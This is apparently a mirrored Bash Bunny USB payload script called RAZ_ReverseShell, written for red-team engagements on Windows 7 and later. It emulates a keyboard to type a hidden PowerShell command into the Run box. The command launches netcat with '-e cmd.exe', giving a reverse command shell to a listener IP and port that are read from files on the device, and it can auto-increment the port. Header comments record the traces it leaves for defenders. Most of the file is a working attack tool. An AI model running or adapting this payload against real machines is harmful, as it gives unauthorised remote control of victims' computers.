mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
A simple script to create a netcat reverse shell. For Red Teamers - you can auto_increment the listener port by setting a flag to true in payload.txt. netcat.exe is not included and must be sourced elsewhere.
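#!/bin/bash
#
# Title:         RAZ_ReverseShell
# Author:        RalphyZ
# Version:       1.0
# Target:        Windows 7+
# Dependencies:  The following files must exist in the switch folder:
#                nc.exe            - Windows binary for netcat with the -e flag
#                                    (verify its hash before an engagement)
#                listener_port.txt - The Port number for the netcat listener
#                listener_ip.txt   - The IP Address for the netcat listener
#
# Description:   Executes a netcat reverse cmd shell at a given IP and Port
#                Intentionally, this script leaves a trace in the Run Box
#
# Artifacts:     The typed command stays in the Run dialog history
#                (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU).
#                Process-creation logging on the target shows powershell.exe
#                with -WindowStyle Hidden starting nc.exe from a removable
#                volume labelled BashBunny with "-e cmd.exe", followed by an
#                outbound connection to the listener IP and port.
#
# Colors:
#   Green.....................Working
#   White.....................Completed without error
#   White (blinking)..........Incrementing the port in listener_port.txt
#   Blue (blinking)...........listener_port.txt was not found or is not a port
#   Light-Blue (blinking).....listener_ip.txt was not found or is not an address
#   Amber (blinking)..........nc.exe was not found

# Change this if you want to enable auto_increment of the netcat port
# If true, the port number is increased by 1 everytime the script runs
# This is good for Red Teams doing PenTesting on multiple computers
auto_increment=false

LED G
ATTACKMODE HID STORAGE

LANGUAGE='us'

# Get the switch position
source bunny_helpers.sh

payload_dir="/root/udisk/payloads/${SWITCH_POSITION}"

# Check for all the files - error if not found. If found, put into variables.
#
# The payload folder sits on the storage volume that the target can see (the
# typed command below runs nc.exe from it), and the two values are typed
# verbatim into the Run box and used in shell arithmetic. Anything that is not
# a plain port number / address is therefore rejected instead of being used.
if [ ! -f "${payload_dir}/listener_port.txt" ]; then
  LED B 100
  exit 1
fi
my_port=$(<"${payload_dir}/listener_port.txt")
my_port=${my_port//$'\r'/}   # tolerate CRLF when the file was edited on Windows
if ! [[ "$my_port" =~ ^[0-9]{1,5}$ ]] \
  || ((10#$my_port < 1 || 10#$my_port > 65535)); then
  LED B 100
  exit 1
fi
# Force base 10 so a leading zero is not read as octal further down
my_port=$((10#$my_port))

if [ ! -f "${payload_dir}/listener_ip.txt" ]; then
  LED B G 100
  exit 1
fi
my_ip=$(<"${payload_dir}/listener_ip.txt")
my_ip=${my_ip//$'\r'/}
# Only characters that occur in IPv4/IPv6 addresses and host names
if ! [[ "$my_ip" =~ ^[A-Za-z0-9.:-]+$ ]]; then
  LED B G 100
  exit 1
fi

if [ ! -f "${payload_dir}/nc.exe" ]; then
  LED R G 100
  exit 1
fi

# Execute the powershell command in the run box with the appropriate variables
QUACK GUI r
QUACK DELAY 100
QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe"
QUACK ENTER

# If auto_increment, then update the listener_port file
if [ "$auto_increment" = true ]; then
  LED R G B 100
  # my_port was validated as a decimal number above, so the arithmetic is safe.
  # A stored value of 65536 is rejected by the range check on the next run.
  printf '%s\n' "$((my_port + 1))" > "${payload_dir}/listener_port.txt"

  # Allow the write to sync to the USB
  sync
  sleep 1
fi

# Signal everything went OK - white
LED R G B
exit 0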